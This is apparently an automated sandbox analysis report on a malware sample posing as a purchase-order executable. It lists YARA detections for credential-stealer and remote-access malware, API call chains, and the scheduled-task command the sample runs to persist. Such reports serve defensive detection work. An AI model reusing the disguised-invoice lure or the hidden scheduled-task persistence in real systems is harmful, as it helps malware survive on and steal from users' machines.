Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.2.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.2.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.ADJUSTED PO3917NOV.exe.15a17b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.ADJUSTED PO3917NOV.exe.15a17b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.3.ADJUSTED PO3917NOV.exe.15a17b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.3.ADJUSTED PO3917NOV.exe.15a17b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000003.327615222.000000000159F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000000.319990653.000000000054F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000000.321513614.000000000054F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000003.327551592.000000000159F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000002.554723844.000000000054F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000000.318229472.000000000054F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000004.00000000.319416601.000000000054F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: String function: 004035E5 appears 39 times
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: String function: 00410969 appears 41 times
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: String function: 046958A0 appears 98 times
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: String function: 046962B0 appears 50 times

Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.325288855.0000000000A54000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameEn.exeb! vs ADJUSTED PO3917NOV.exe
Source: ADJUSTED PO3917NOV.exe, 00000004.00000000.318645839.0000000001034000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameEn.exeb! vs ADJUSTED PO3917NOV.exe
Source: ADJUSTED PO3917NOV.exe	Binary or memory string: OriginalFilenameEn.exeb! vs ADJUSTED PO3917NOV.exe

Source: ADJUSTED PO3917NOV.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File created: C:\Users\user\AppData\Roaming\QUQovKcaZRcNZ.exe

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@6/6@0/1

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_3_04698C40 GetLastError,GetVersionExW,FormatMessageW,FormatMessageA,_free,LocalFree,_free,

4_3_04698C40

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0040D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

4_2_0040D49C

Source: ADJUSTED PO3917NOV.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_004130B3 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,

4_2_004130B3

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: ADJUSTED PO3917NOV.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File read: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe "C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe"
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QUQovKcaZRcNZ" /XML "C:\Users\user\AppData\Local\Temp\tmpD7D5.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process created: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QUQovKcaZRcNZ" /XML "C:\Users\user\AppData\Local\Temp\tmpD7D5.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Process created: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0040F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,

4_2_0040F619

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File created: C:\Users\user\AppData\Local\Temp\tmpD7D5.tmp

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0040F80E CoInitializeSecurity,CoInitialize,CoCreateInstance,VariantInit,

4_2_0040F80E

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

